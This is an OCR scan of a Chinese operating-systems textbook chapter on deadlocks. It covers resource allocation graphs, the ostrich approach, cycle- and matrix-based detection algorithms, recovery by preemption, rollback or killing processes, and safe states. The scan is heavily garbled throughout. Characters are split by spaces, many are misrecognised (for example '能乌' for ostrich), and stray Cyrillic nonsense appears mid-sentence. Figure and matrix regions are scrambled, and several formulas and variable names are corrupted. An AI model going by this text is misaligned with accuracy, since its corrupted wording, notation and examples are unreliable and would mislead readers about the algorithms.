不 过 ， 如 果 所 有 的 进程 都 不 执行 LO 操作 ， 那 么 最 短 作业 优 先 调度 会 比 轮转 调度 优越 ， 所 以 在 这 种 情况 
下 ， 串 行 运行 有 可 能 是 最 优 的 。 

如 果 假设 进程 操作 包含 WO 和 计算 ， 那 么 轮转 法 是 一 种 合适 的 调度 算法 。 对 资源 请 求 的 次 序 可 能 会 
如 图 6-4d 所 示 。 假 如 按 这 个 次 序 执行 ， 图 6-4e 一 图 6-4j 是 相应 的 资源 分 配 图 。 在 出 现 请 求 4 后 ， 如 图 6-4h 
所 示 ， 进 程 A 被 阻塞 等 待 S， 后 续 两 步 中 的 B 和 C 也 会 被 阻塞 ， 结 果 如 图 6-4j 所 示 ， 产 生 环 路 并 导致 死 锁 。 

不 过 正如 前 面 所 讨论 的 ， 并 没有 规定 操作 系统 要 按照 某 一 特定 的 次 序 来 运行 这 些 进程 。 特 别 地 ， 对 
于 一 个 有 可 能 引起 死 锁 的 资源 请 求 ， 操 作 系统 可 以 干脆 不 批准 请 求 ， 并 把 该 进程 挂 起 ( 即 不 参与 调度 ) 
一 直到 处 于 安全 状态 为 止 。 在 图 6-4 中 ， 假 设 操 作 系统 知道 有 引起 死 锁 的 可 能 ， 那 么 它 可 以 不 把 资源 $ 分 
配给 B， 这 样 B 被 挂 起 。 假 如 只 运行 进程 A 和 C， 那 么 资源 请 求 和 释放 的 过 程 会 如 图 6-4k 所 示 ， 而 不 是 如 
图 6-4d 所 示 。 这 一 过 程 的 资源 分 配 图 在 图 6-41 一 图 6-4q 中 给 出 ， 其 中 没有 死 锁 产生 。 

在 第 9 步 执行 完 后 ， 就 可 以 把 资源 S 分 配给 B 了 ， 因 为 A 已 经 完成 ， 而 且 C 获 得 了 它 所 需要 的 所 有 资 
源 。 尽 管 B 会 因为 请 求 T 而 等 待 ， 但 是 不 会 引起 死 锁 ，B 只 需要 等 待 C 结 束 。 

在 本 章 后 面 我 们 将 考察 一 个 具体 的 算法 ， 用 以 做 出 不 会 引起 死 锁 的 资源 分 配 决 策 。 在 这 里 需要 说 明 
的 是 ， 资 源 分 配 图 可 以 用 作 一 种 分 析 工具 ， 考 察 对 一 给 定 的 请 求 /释放 的 序列 是 否 会 引起 死 锁 。 只 需要 
按照 请 求 和 释放 的 次 序 一 步 步 进行 ， 每 一 步 之 后 都 检查 图 中 是 否 包括 了 环 路 。 如 果 有 环 路 ， 那 么 就 有 死 
锁 ， 反 之 ， 则 没有 死 锁 。 在 我 们 的 例子 中 ， 虽 然 只 和 同一 类 资源 有 关 ， 而 且 只 包含 一 个 实例 ， 但 是 上 面 
的 原理 完全 可 以 推广 到 有 多 种 资源 并 含有 若干 个 实例 的 情况 中 去 (Нон, 1972), 

总 而 言 之 ， 有 四 种 处 理 死 锁 的 策略 : 

1) 忽略 该 问题 。 也 许 如 果 你 忽略 它 ， 它 也 会 忽略 你 。 

2) 检测 死 锁 并 恢复 。 让 死 锁 发 生 ， 检 测 它 们 是 否 发 生 ， 一 旦 发 生死 锁 ， 采 取 行 动 解决 问题 。 

З) 仔细 对 资源 进行 分 配 ， 动 态 地 避免 死 锁 。 

4) 通过 破坏 引起 死 锁 的 四 个 必要 条 件 之 一 ， 防 止 死 锁 的 产生 。 

下 面 四 节 将 分 别 讨论 这 四 种 方法 。 
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最 简单 的 解决 方法 是 能 乌 算 法 :把 头 埋 到 沙子 里 ， 假 装 根本 没有 问题 发 生 S 。 每 个 人 对 该 方法 的 看 
法 都 不 相同 。 数 学 家 认为 这 种 方法 根本 不 能 接受 ， 不 论 代 价 有 多 大 ， 都 要 彻底 防止 死 锁 的 产生 ， 工 程 师 
们 想 要 了 解 死 锁 发 生 的 频 度 、 系 统 因 各 种 原因 崩溃 的 发 生 次 数 以 及 死 锁 的 严重 性 。 如 果 死 锁 平均 每 5 年 
发 生 一 次 ， 而 每 个 月 系统 都 会 因 硬件 故障 、 编 译 器 错误 或 者 操作 系统 故障 而 崩溃 一 次 ， 那 么 大 多 数 的 工 
程 师 不 会 以 性 能 损失 和 可 用 性 的 代价 去 防止 死 锁 。 

为 了 能 够 让 这 一 对 比 更 具体 ， 考虑 如 下 情况 的 一 个 操作 系统 ， 当 一 个 open 系 统 调用 因 物 理 设备 
(例如 CD-ROM 驱 动 程序 或 者 打印 机 ) 人 忙 而 不 能 得 到 响应 的 时 候 ， 操 作 系统 会 阻塞 调用 该 系统 调用 的 进 
程 。 通 常 是 由 设备 驱动 来 决定 在 这 种 情况 下 应 该 采取 何 种 措施 。 显 然 ， 阻 塞 或 者 返回 -个 错误 代码 是 两 
种 选择 。 如 果 一 个 进程 成 功 地 打开 了 CD-ROM 驱 动 器 ， 而 另 一 个 进程 成 功 地 打开 了 打印 机 ， 这 时 每 个 
进程 都 会 试图 去 打开 另外 一 个 设备 ， 然 后 系统 会 阻塞 这 种 尝试 ， 从 而 发 生死 锁 。 现 有 系统 很 少 能 够 检测 
到 这 种 死 锁 。 


6.4 死 锁 检 测 和 死 锁 恢 复 

第 二 种 技术 是 死 锁 检 测 和 恢复 。 在 使 用 这 种 技术 时 ， 系 统 并 不 试图 阻止 死 锁 的 产生 ， 而 是 允许 死 锁 
发 生 ， 当 检测 到 死 锁 发 生 后 ， 采 取 措施 进行 恢复 。 本 节 我 们 将 考察 检测 死 锁 的 几 种 方法 以 及 恢复 死 锁 的 
几 种 方法 。 


Ө 这 一 民间 传说 毫 无 道理 。 能 乌 每 小 时 跑 60 公 里 ,为 了 得 到 一 顿 丰盛 的 晚餐 ， 它 一 脚 的 力量 足以 踢 死 - 头 狂 子 。 
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6.4.1 每 种 类 型 一 个 资源 的 死 锁 检 测 

我 们 从 最 简单 的 例子 开始 ， 即 每 种 类 型 只 有 一 个 资源 。 这 样 的 系统 可 能 有 一 台 扫 描 仪 、 一 台 CD 刻 
录 机 、 一 台 绘 图 仪 和 一 台 磁 带 机 ， 但 每 种 类 型 的 资源 都 不 超过 一 个 ， 即 排除 了 同时 有 两 台 打印 机 的 情况 。 
稍 后 我 们 将 用 另 一 种 方法 来 解决 两 台 打 印 机 的 情况 。 

可 以 对 这 样 的 系统 构造 一 张 资源 分 配 图 ， 如 图 6-3 所 示 。 如 果 这 张 图 包含 了 一 个 或 一 个 以 上 的 环 ， 
那么 死 锁 就 存在 。 在 此 环 中 的 任何 一 个 进程 都 是 死 锁 进 程 。 如 果 没 有 这 样 的 环 ， 系 统 就 没有 发 生死 锁 。 

我 们 讨论 一 下 更 复杂 的 情况 ， 假 设 一 个 系统 包括 A 到 G 共 7 个 进程 ，R 到 W 共 6 种 资源 。 资 源 的 占有 情 
况 和 进程 对 资源 的 请 求情 况 如 下 : 

1) A 进程 持 有 R 资 源 ， 且 需要 5 资源 。 

2) B 进 程 不 持 有 任何 资源 ， 但 需要 T 资 源 。 

3) C 进 程 不 持 有 任何 资源 ， 但 需要 S 资 源 。 

4) D 进 程 持 有 U 资 源 ， 且 需要 S 资 源 和 T 资 源 。 

5) E 进 程 持 有 T 资 源 ， 且 需要 V 资 源 。 

б) F 进 程 持 有 W 资 源 ， 且 需要 S 资 源 。 

7) G 进 程 持 有 V 资 源 ， 且 需要 U 资 源 。 

问题 是 :“ 系 统 是 否 存在 死 锁 ? 如 果 存 在 的 话 ， 死 锁 涉 及 了 哪些 进程 了 ” 

要 回答 这 一 问题 ， 我 们 可 以 构造 一 张 资源 分 配 图 ， 如 图 6-5a 所 示 。 可 以 直接 观察 到 这 张 图 中 包含 了 
一 个 环 ， 如 图 6-5b 所 示 。 在 这 个 环 中 ， 我 们 可 以 看 出 进程 D、E、G 已 经 死 锁 。 进 程 A、C、F 没 有 死 锁 ， 
这 是 因为 可 把 $ 资 源 分 配给 它们 中 的 任 一 个 ， 而 且 它们 中 的 任 一 进程 完成 后 都 能 释放 S$， 于 是 其 他 两 个 进 
程 可 依次 执行 ， 直 至 执行 完毕 。( 请 注意 ， 为 了 让 这 个 例子 更 有 趣 ， 我 们 允许 进程 D 每 次 请 求 两 个 资源 ,) 
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虽然 通过 观察 一 张 简单 的 图 就 能 够 很 容易 地 找 出 死 锁 进程 ， 但 为 了 实用 ， 我 们 仍然 需要 一 个 正规 的 
算法 来 检测 死 销 。 众 所 周知 ， 有 很 多 检测 有 向 图 环 路 的 方法 。 下 面 将 给 出 一 个 简单 的 算法 ， 这 种 算法 对 
有 向 图 进行 检测 ， 并 在 发 现 图 中 有 环 路 存在 或 无 环 路 时 结束 。 这 一 算法 使 用 了 数据 结构 L， L 代 表 一 些 节 
点 的 集合 。 在 这 一 算法 中 ， 对 已 经 检查 过 的 (有 向 边 ) 进行 标记 ， 以 免 重复 检查 。 

通过 执行 下 列 步骤 完成 上 述 算法 : 

1) 对 图 中 的 每 一 个 节点 N， 将 N 作 为 起 始点 执行 下 面 5 个 步骤 。 

2) 将 L 初 始 化 为 空 表 ， 并 清除 所 有 的 有 向 边 标 记 。 

З) 将 当前 节点 添加 到 L 的 尾部 ， 并 检测 该 节点 是 否 在 L 中 已 出 现 过 两 次 。 如 果 是 ， 那么 该 图 包含 了 
一 个 环 (已 列 在 L 中 )， 算 法 结束 。 

4) 从 给 定 的 节点 开始 ， 检 测 是 否 存在 没有 标记 的 从 该 节点 出 发 的 弧 (有 向 边 )。 如 果 存 在 的 话 ， 做 
第 5 步 ， 如 果 不 存 在 ， 跳 到 第 6 步 。 

5) 随机 选取 一 条 没有 标记 的 从 该 节点 出 发 的 弧 (有 向 边 )， 标 记 它 。 然后 顺 着 这 条 弧 线 找到 新 的 当 
前 节点 ， 返 回 到 第 3 步 。 

6) 如 果 这 一 节点 是 起 始 节点 ， 那 么 表明 该 图 不 存在 任何 环 ， 算 法 结束 。 否则 意味 着 我 们 走 进 了 死 胡 
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同 ， 所 以 需要 移 走 该 节点 ,返回 到 前 一 个 节点 ， 即 当前 节点 前 面 的 一 个 节点 ， 并 将 它 作为 新 的 当前 节点 ， 
同时 转 到 第 3 步 。 

这 一 算法 是 依次 将 每 一 个 节点 作为 一 棵 树 的 根 节点 ， 并 进行 深度 优先 搜索 。 如 果 再 次 碰 到 已 经 过 到 
过 的 节点 ， 那 么 就 算 找到 了 一 个 环 。 如 果 从 任何 给 定 的 节点 出 发 的 弧 都 被 穷 举 了 ， 那 么 就 回 淹 到 前 面 的 
节点 。 如 果 回 亢 到 根 并 且 不 能 再 深入 下 去 ， 那 么 从 当前 节点 出 发 的 子 图 中 就 不 包含 任何 环 。 如 果 所 有 的 
节点 都 是 如 此 ， 那 么 整个 图 就 不 存在 环 ， 也 就 是 说 系统 不 存在 死 锁 。 

为 了 验证 一 下 该 算法 是 如 何 工作 的 ， 我 们 对 图 6-5a 运 用 该 算法 。 算 法 对 节点 次 序 的 要 求 是 任意 的 ， 
所 以 可 以 选择 从 左 到 右 、 从 上 到 下 进行 检测 ， 首 先 从 R 节 点 开始 运行 该 算法 ， 然 后 依次 从 A、B、C、S、 
D、T、E、F 开 始 。 如 果 遇 到 了 一 个 环 ， 那 么 算法 停止 。 

我 们 先 从 R 节 点 开始 ， 并 将 L 初 始 化 为 空 表 。 然 后 将 R 添 加 到 空 表 中 ， 并 移动 到 惟一 可 能 的 节点 A， 将 
它 添加 到 L 中 ， 变 成 L=-[R，A]。 从 A 我 们 到 达 S， 并 使 L=[R，A，S]。S 没 有 出 发 的 弧 ， 所 以 它 是 条 死路 ， а 
ВЕЗЕТ ЯЈА, ВЕРА ЕГЕТЕ Гао, FEMER, 从 而 完成 了 以 R 为 起 始点 的 检测 。 

现在 我 们 重新 以 A 为 起 始点 启动 该 算法 ， 并 重 置 为 空 表 。 这 次 检索 也 很 快 就 结束 了 ， 所 以 我 们 又 
从 B 开 始 。 从 B 节 点 我 们 顺 着 狐 到 达 D， 这 时 L=[B，T，E，V，G，U，D]。 现 在 我 们 必须 随机 选择 。 如 
果 迄 S 点 ， 那 么 走 进 了 死胡同 并 回 湖 到 D。 接 着 选 T 并 将 L 更 新 为 B，T，E，V，G，U，D， 了 ,在 这 一 
点 上 我 们 发 现 了 环 ， 算 法 结束 。 

这 种 算法 远 不 是 最 佳 算法 ， 较 好 的 一 种 算法 参见 (Even,1979)。 但 毫 无 疑问 ， 该 实例 表明 确实 存在 
检测 死 锁 的 算法 。 


6.4.2 每 种 类 型 多 个 资源 的 死 锁 检测 

如 果 有 多 种 相同 的 资源 存在 ， 就 需要 采用 另 一 种 方法 来 检测 死 镇 。 现在 我 们 提供 一 种 基于 和 矩阵 的 算 
法 来 检测 从 P, 到 P, 这 a 个 进程 中 的 死 锁 。 假 设 资源 的 类 型 数 为 m，E, 代 表 资 源 类 型 1， 已 代表 资源 类 型 2， 
尼 代 表 资 源 类 型 1 <i<m)。E 是 现 有 资源 向 量 (existing resource vector)， 代 表 每 种 已 存在 的 资源 总 数 。 
比如 ， 如 果 资 源 类 型 1! 代表 磁带 机 ， 那 么 E,=2 就 表示 系统 有 两 台 磁 带 机 。 

在 任意 时 刻 ， 某 些 资源 已 被 分 配 所 以 不 可 用 。 假 设 4 是 可 用 资源 向 量 (available resource vector), 
那么 4, 表示 当前 可 供 使 用 的 资源 数 〈( 即 没有 被 分 配 的 资源 ) 。 如 果 仅 有 的 两 台 磁 带 机 都 已 经 分 配 出 去 了 ， 
那么 4, 的 值 为 0。 

现在 我 们 需要 两 个 数组 ，C 代 表 当 前 分 配 乱 阵 (current allocation matrix), R 代 表 请 求 矩阵 
(request matrix)。C 的 第 ; 行 代表 P, 当前 所 持 有 的 每 一 种 类 型 资源 的 资源 数 。 所 以 ，Cv 代表 进程 所持 有 
的 资源 的 数量 。 同 理 ，R, 代 表 P, 所 需要 的 资源 j 的 数量 。 这 四 种 数据 结构 如 图 6-6 所 示 。 


现 有 资源 可 用 资源 
(Е,.Е,.Е,, 07, En) (Ar, Az hs, An) 
SERE IRERE 
Ca Gs С CG, Ri Ra Ry = Ru 


© Ca aG Ro Ro Ro o Б, 
E Ca Ca С ~ с. Ra Ra Ra Ra 


第 m 行 是 进程 "当前 已 分 配 到 的 资源 第 2 行 是 进程 2 需要 的 资源 


图 6-6 死 锁 检测 算法 所 需 的 四 种 数据 结构 
这 四 种 数据 结构 之 间 有 一 个 重要 的 恒等式 。 具 体 地 说 ， 某 种 资源 要 么 已 分 配 要 么 可 用 。 这 个 结论 意味 着 ; 


ўс, +А,=Е, 
= 
换言之 ， 如 果 我 们 将 所 有 已 分 配 的 资源 /的 数量 加 起 来 再 和 所 有 可 供 使 用 的 资源 数 相 加 ， 结果 就 是 
该 类 资源 的 资源 总 数 。 
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死 锁 检测 算法 就 是 基于 向 量 的 比较 。 我 们 定义 向 量 4 和 向 量 B 之 间 的 关系 为 4A<B 以 表明 4 的 每 一 个 分 
量 要 么 等 于 要 么 小 于 和 B 向 量 相对 应 的 分 量 。 从 数学 上 来 说 ，4<B 当 且 仅 当 且 Ai<BK0<i<sm。 

每 个 进程 起 初 都 是 没有 标记 过 的 。 算法 开始 会 对 进程 做 标记 , 进程 被 标记 后 就 表明 它们 能 够 被 执行 ， 
会 进入 死 锁 。 当 算法 结束 时 ， 任 何 没有 标记 的 进程 都 是 死 锁 进程 。 该 算法 假定 了 一 个 最 坏 情形 ; 所 有 
的 进程 在 退出 以 前 都 会 不 停 地 获取 资源 。 

死 锁 检测 算法 如 下 : 

1) 寻找 一 个 没有 标记 的 进程 已， 对 于 它 而 言 R 矩 阵 的 第 圭 向 量 小 于 或 等 于 4。 

2) 如 果 找 到 了 这 样 一 个 进程 ， 那 么 将 C 和 矩阵 的 第 诗 向 量 加 到 4 中 ， 标 记 该 进程 ， 并 转 到 第 1 步 。 

3) 如 果 没 有 这 样 的 进程 ， 那 么 算法 终止 。 

算法 结束 时 ， 所 有 没有 标记 过 的 进程 (如果 存 在 的 话 ) 都 是 死 锁 进程 。 

算法 的 第 1 步 是 寻找 可 以 运行 完毕 的 进程 ， 该 进程 的 特点 是 它 有 资源 请 求 并 且 该 请 求 可 被 当前 的 可 
用 资源 满足 。 这 一 选中 的 进程 随后 就 被 运行 完毕 ， 在 这 段 时 间 内 它 释放 自己 持 有 的 所 有 资源 并 将 它们 返 
回 到 可 用 资源 库 中 。 然 后 ， 这 一 进程 被 标记 为 完成 。 如 果 所 有 的 进程 最 终 都 能 运行 完毕 的 话 ， 就 不 存在 
死 锁 的 情况 。 如 果 其 中 某 些 进程 一 直 不 能 运行 ， 那 么 它们 就 是 死 锁 进程 。 虽 然 算法 的 运行 过 程 是 不 确定 
的 〈 因 为 进程 可 按 任何 行 得 通 的 次 序 执行 )， 但 结果 总 是 相同 的 。 

作为 一 个 例子 ， 在 图 6-7 中 展示 了 用 该 算法 检测 死 锁 的 工作 过 程 。 这 里 我 们 有 3 个 进程 、4 种 资源 
(可 以 任意 地 将 它们 标记 为 磁带 机 、 绘 图 仪 、 扫 描 仪 和 CD-ROM 驱 动 器 ) 。 进 程 1 有 一 台 扫描 仪 。 进 程 2 有 
2 台 磁 带 机 和 1 个 CD-ROM 驱 动 器 。 进 程 3 有 1 个 绘图 仪 和 2 人 台 扫描 仪 。 每 一 个 进程 都 需要 额外 的 资源 ， 如 
矩阵 R 所 示 。 

要 运行 死 锁 检测 算法 ， 首 先 找 出 哪 一 个 进程 的 资源 请 求 可 被 满足 。 第 1 个 不 能 被 满足 ， 因 为 没有 
CD-ROM 驱 动 器 可 供 使 用 。 dd i 由 于 没有 打印 机 空闲 。 幸 运 的 是 ， 第 3 个 可 被 满足 ， 所 
以 进程 3 运行 并 最 终 释放 它 所 拥有 的 资源 ， 给 出 

4=(2220) 
接 下 来 ， 进 程 2 也 可 运行 并 释放 它 所 拥有 的 资源 ， 给 出 
А=(4221) 


现在 剩 下 的 进程 都 能 够 运行 ， 所 以 这 个 系统 中 不 存在 死 锁 。 


假设 图 6-7 的 情况 有 所 改变 。 进 程 2 需要 1 个 CD- & 
ROM 驱 动 器 、2 台 磁带 机 和 1 台 绘图 仪 。 在 这 种 情况 下 у И 
26 台 绘图 仪 。 . Sg Ss Фо 

所 有 的 请 求 都 不 能 得 到 满足 ， 整 个 系统 进入 死 锁 。 Фа е 

现在 我 们 知道 了 如 何 检测 死 锁 (至 少 是 在 这 种 E=(4 2 3 п ан 
预先 知道 静态 资源 请 求 的 情况 下 )， 但 问题 在 于 何 时 
去 检测 它们 。 一 种 方法 是 每 当 有 资源 请 求 时 去 检测 。 айданы 请 求 矩阵 
毫 无 疑问 越 早 发 现 越 好 ， 但 这 种 方法 会 占用 品 贵 的 e-f; o :| ls 220 :| 
CPU 时 间 。 另 一 种 方法 是 每 隔 k 分 钟 检测 一 次 ， 或 者 о1го 2100 
当 CPU 的 使 用 率 降 到 某 一 域 值 时 去 检测 。 考 虑 到 图 6.7 死 锁 检测 算法 的 一 个 例子 


CPU 使 用 效率 的 原因 ， 如 果 死 锁 进程 数 达到 一 定数 
量 ， 就 没有 多 少 进程 可 运行 了 ， 所 以 CPU 会 经 常 空闲 。 
643 从 死 锁 中 恢复 
假设 我 们 的 死 锁 检测 算法 已 成 功 地 检测 到 了 死 锁 ， 那 么 下 一 步 该 怎么 办 ? 当然 需要 一 些 方法 使 系统 重 
新 正常 工作 。 在 本 小 节 中 ， 我 们 会 讨论 各 种 从 死 锁 中 恢复 的 方法 ， 尽 管 这 些 方法 看 起 来 都 不 那么 令 人 满意 。 
1 .利用 抢占 恢复 
在 某 些 情况 下 ， 可 能 会 临时 将 某 个 资源 从 它 的 当前 所 有 者 那里 转移 到 另 一 个 进程 。 许 多 情况 下 ， 万 
其 是 对 运行 在 大 型 主机 上 的 批 处 理 操作 系统 来 说 ， 需 要 人 工 进行 干预 。 
比如 ， 要 将 激光 打印 机 从 它 的 持 有 进程 那里 拿 走 ， 管 理 员 可 以 收集 已 打印 好 的 文档 并 将 其 堆积 在 一 
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旁 。 然 后 ， 该 进程 被 挂 起 (标记 为 不 可 运行 )。 接 着 ， 打 印 机 被 分 配给 另 一 个 进程 。 当 那个 进程 结束 后 ， 
堆 企 一 旁 的 文档 再 被 重新 放 回 原 处 ， 原 进程 可 重新 继续 工作 。 

在 不 通知 原 进程 的 情况 下 ， 将 某 一 资源 从 一 个 进程 强行 取 走 给 另 一 个 进程 使 用 ， 接 着 又 送 回 ， 这 种 
做 法 是 否 可 行 主要 取决 于 该 资源 本 身 的 特性 。 用 这 种 方法 恢复 通常 比较 困难 或 者 说 不 太 可 能 。 若 选择 挂 
起 某 个 进程 ， 则 在 很 大 程度 上 取决 于 哪 一 个 进程 拥有 比较 容易 收回 的 资源 。 

2. 利用 回 滚 恢复 

如 果 系 统 设 计 人 员 以 及 主机 操作 员 了 解 到 死 锁 有 可 能 发 生 ， 他 们 就 可 以 周期 性 地 对 进程 进行 检查 点 
检查 〈checkpointed)。 进 程 检查 点 检查 就 是 将 进程 的 状态 写 和 一 个 文件 以 备 以 后 重启 。 该 检查 点 中 不 仅 包 
括 存储 映像 ， 还 包括 了 资源 状态 ， 即 哪些 资源 分 配给 了 该 进程 。 为 了 使 这 一 过 程 更 有 效 ， 新 的 检查 点 不 
应 覆盖 原 有 的 文件 ， 而 应 写 到 新 文件 中 。 这 样 ， 当 进程 执行 时 ， 将 会 有 一 系列 的 检查 点 文件 被 累积 起 来 。 

一 旦 检测 到 死 锁 ， 就 很 容易 发 现 需要 哪些 资源 。 为 了 进行 恢复 ， 要 从 一 个 较 早 的 检查 点 上 开始 ， 这 
样 拥有 所 需要 资源 的 进程 会 回 滚 到 一 个 时 间 点 ， 在 此 时 间 点 之 前 该 进程 获得 了 一 些 其 他 的 资源 。 在 该 检 
查 点 后 所 做 的 所 有 工作 都 丢失 。( 例 如 ， 检 查 点 之 后 的 输出 必须 丢弃 ， 因 为 它们 还 会 被 重新 输出 .) 实际 
上 ， 是 将 该 进程 复位 到 一 个 更 早 的 状态 ， 那 时 它 还 没有 取得 所 需 的 资源 ， 接 着 就 把 这 个 资源 分 配给 一 个 
死 锁 进程 。 如 果 复 位 后 的 进程 试图 重新 获得 对 该 资源 的 控制 ， 它 就 必须 一 直 等 到 该 资源 可 用 时 为 止 。 

3. 通过 杀 死 进程 恢复 

最 直接 也 是 最 简单 的 解决 死 镇 的 方法 是 杀 死 一 个 或 若干 个 进程 。 一 种 方法 是 杀 掉 环 中 的 一 个 进程 。 如 
果 走 运 的 话 ， 其 他 进程 将 可 以 继续 。 如 果 这 样 做 行 不 通 的 话 ， 就 需要 继续 杀 死 别 的 进程 直到 打破 死 锁 环 。 

另 一 种 方法 是 选 一 个 环 外 的 进程 作为 轩 牲 品 以 释放 该 进程 的 资源 。 在 使 用 这 种 方法 时 ， 选择 一 个 要 
被 杀 死 的 进程 要 特别 小 心 ， 它 应 该 正好 持 有 环 中 某 些 进程 所 需 的 资源 。 比 如 ， 一 个 进程 可 能 持 有 一 台 绘 
图 仪 而 需要 一 台 打印 机 ， 而 另 一 个 进程 可 能 持 有 一 台 打印 机 而 需要 一 台 绘 图 仪 ， 因而 这 两 个 进程 是 死 锁 
的 。 第 三 个 进程 可 能 持 有 另 一 台 同 样 的 打印 机 和 另 一 台 同 样 的 绘图 仪 而 且 正在 运行 着 。 杀 死 第 三 个 进程 
将 释放 这 些 资源 ， 从 而 打破 前 两 个 进程 的 死 锁 。 

有 可 能 的 话 ， 最 好 杀 死 可 以 从 头 开始 重新 运行 而 且 不 会 带 来 副作用 的 进程 。 比 如 ， 编译 进程 可 以 被 
重复 运行 ， 由 于 它 只 需要 读 人 一 个 源 文件 和 产生 一 个 目标 文件 。 如 果 将 它 中 途 杀 死 ， 它 的 第 一 次 运行 不 
会 影响 到 第 二 次 运行 。 

另 一 方面 ， 更 新 数据 库 的 进程 在 第 二 次 运行 时 并 非 总 是 安全 的 。 如 果 一 个 进程 将 数据 库 的 某 个 记录 
加 1， 那 么 运行 它 一 次 ， 将 它 杀 死 后 ， 再 次 执行 ， 就 会 对 该 记录 加 2， 这 显然 是 错误 的 。 


6.5 死 锁 避免 
在 讨论 死 锁 检 测 时 ， 我 们 假设 当 一 个 进程 请 求 资源 时 ， 它 一 次 就 请 求 所 有 的 资源 ( 见 图 6-6 中 的 失 

阵 R)。 不 过 在 大 多 数 系统 中 ， 一 次 只 请 求 一 个 资源 。 系 统 必须 能 够 判断 分 配 资源 是 否 安全 ， 并 且 只 能 在 
保证 安全 的 条 件 下 分 配 资源 。 问 题 是 : ў 
是 否 存在 一 种 算法 总 能 做 出 正确 的 选择 о (изат 
从 而 各 免 死 锁 ?》 答案 是 肯定 的 ， 但 条 件 = TR): 

| 

' 


l 
b 


< 


绘图 仪 5 


是 必须 事先 获得 一 些 特定 的 信息 。 本 节 
我 们 会 讨论 几 种 死 锁 避 免 的 方法 。 
6.5.1 资源 轨迹 图 

避免 死 锁 的 主要 算法 是 基于 一 个 安 
全 状态 的 概念 。 在 描述 算法 前 ， 我 们 先 
讨论 有 关 安 全 的 概念 。 通 过 图 的 方式 ， 
能 更 容易 理解 。 虽 然 图 的 方式 不 能 被 直 
接 翻译 成 有 用 的 算法 ， 但 它 给 出 了 一 个 打印 机 


解决 问题 的 直观 感受 。 一 一 > 绘图 仪 
在 图 6-8 中 ， 我 们 看 到 一 个 处 理 两 图 6-8 两 个 进程 的 资源 轨迹 图 
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个 进程 和 两 种 资源 (打印机 和 绘图 仪 ) 的 模型 。 横 轴 表 示 进 程 A 执 行 的 指令 ， 纵 轴 表示 进程 B 执 行 的 指 
令 。 进 程 A 在 0 处 请 求 一 台 打印 机 ， 在 B 处 释放 ， 在 D 处 请 求 一 台 绘 图 仪 ， 在 1 处 释放 。 进 程 B 在 1 到 [之 
间 需 要 绘图 仪 ， 在 I 到 I 之 间 需 要 打印 机 。 

图 6-8 中 的 每 一 点 都 表示 出 两 个 进程 的 连接 状态 。 初 始点 为 p， 没 有 进程 执行 任何 指令 。 如 果 调度 程 
序 选 中 A 先 运行 ， 那 么 在 A 执 行 一 段 指令 后 到 达 q9， 此 时 B 设 有 执行 任何 指令 。 在 9 点 ， 如 果 轨 迹 沿 垂直 方 
向 移动 ， 表 示 调 度 程序 选中 B 运 行 。 在 单 处 理 机 情况 下 ， 所 有 路 径 都 只 能 是 水 平 或 垂直 方向 的 ， 不 会 出 
现 斜 向 的 。 因 此 ， 运 动 方向 一 定 是 向 上 或 向 右 ， 不 会 向 左 或 向 下 ， 因 为 进程 的 执行 不 可 能 后 退 。 

当 进程 A 由 r 向 s 移 动 穿 过 0 线 时 ， 它 请 求 并 获得 打印 机 。 当 进程 B 到 达 ! 时 ， 它 请 求 绘图 仪 。 

图 中 的 阴影 部 分 是 我 们 感 兴趣 的 ， 画 着 从 左下 到 右上 和 斜 线 的 部 分 表示 在 该 区 域 中 两 个 进程 都 拥有 打 
印 机 ， 而 互 斥 使 用 的 规则 决定 了 不 可 能 进入 该 区 域 。 另 一 种 斜 线 的 区 域 表 示 两 个 进程 都 拥有 绘图 仪 ， 且 
同样 不 可 进入 。 

如 果 系 统一 旦 进入 由 !、1 和 1、L 组 成 的 矩形 区 域 ， 那 么 最 后 一 定 会 到 达 D 和 Le 的 交叉 点 ， 这 时 就 产 
生死 锁 。 在 该 点 处 ，A 请 求 绘图 仪 ，B 请 求 打印 机 ， 而 且 这 两 种 资源 均 已 被 分 配 。 这 整个 矩形 区 域 都 是 
不 安全 的 ， 因 此 决 不 能 进入 这 个 区 域 。 在 点 t 处 惟一 的 办 法 是 运行 进程 A 直到 1,， 过 了 I 后 ， 可 以 按 任何 
路 线 前 进 ， 直 到 终点 u。 

需要 注意 的 是 ， 在 点 ! 进 程 B 请 求 资源 。 系 统 必须 决定 是 否 分 配 。 如 果 系 统 把 资源 分 配给 B， 系 统 进 
入 不 安全 区 域 ， 最 终 形成 死 锁 。 要 避免 死 锁 ， 应 该 将 B 挂 起 ， 直 到 A 请 求 并 释放 绘图 仪 。 


6.5.2 安全 状态 和 不 安全 状态 

我 们 将 要 研究 的 死 锁 避免 算法 使 用 了 图 6-6 中 的 有 关 信 息 。 在 任何 时 刻 ， 当 前 状态 包括 了 E、A、C 
和 R。 如 果 没 有 死 锁 发 生 ， 并 且 即 使 所 有 进程 突然 请 求 对 资源 的 最 大 需求 ， 也 仍然 存在 某 种 调度 次 序 能 
够 使 得 每 一 个 进程 运行 完毕 ， 则 称 该 状态 是 安全 的 。 通 过 使 用 一 个 资源 的 例子 很 容易 说 明 这 个 概念 。 在 
图 6-9a 中 有 一 个 A 拥有 3 个 资源 实例 但 最 终 可 能 会 需要 9 个 资源 实例 的 状态 。B 当 前 拥有 2 个 资源 实例 ， 将 
来 共 需 要 4 个 资源 实例 。 同 样 ，C 拥 有 2 个 资源 实例 ， 还 需要 另外 5 个 资源 实例 。 总 共有 10 个 资源 实例 ， 其 
中 有 ?7 个 资源 已 经 分 配 ， 还 有 3 个 资源 是 空 闻 的 。 


已 有 最 大 已 有 最 大 已 有 最 大 已 有 最 大 已 有 最 大 
数量 需求 数量 Л кк za == = 数量 需求 
з [з А А А][з][э 
H 2 | 4 B в вјо | - 
с[2 [2 с c clol- 
ZA: 3 1 ee Fm: 0 ZA: 7 


а) © 
图 6-9 说 明 a 中 的 状态 为 安全 状态 


图 6-9a 的 状态 是 安全 的 ， 这 是 由 于 存在 一 个 分 配 序列 使 得 所 有 的 进程 都 能 完成 。 也 就 是 说 ， 这 个 方 
案 可 以 单独 地 运行 B， 直 到 它 请 求 并 获得 另外 两 个 资源 实例 ， 从 而 到 达 图 6-9b 的 状态 。 当 B 完 成 后 ， 就 到 
达 了 图 6-9c 的 状态 。 然 后 调度 程序 可 以 运行 C， 再 到 达 图 6-9d 的 状态 。 当 C 完 成 后 ， 到 达 了 图 6-9e 的 状态 。 
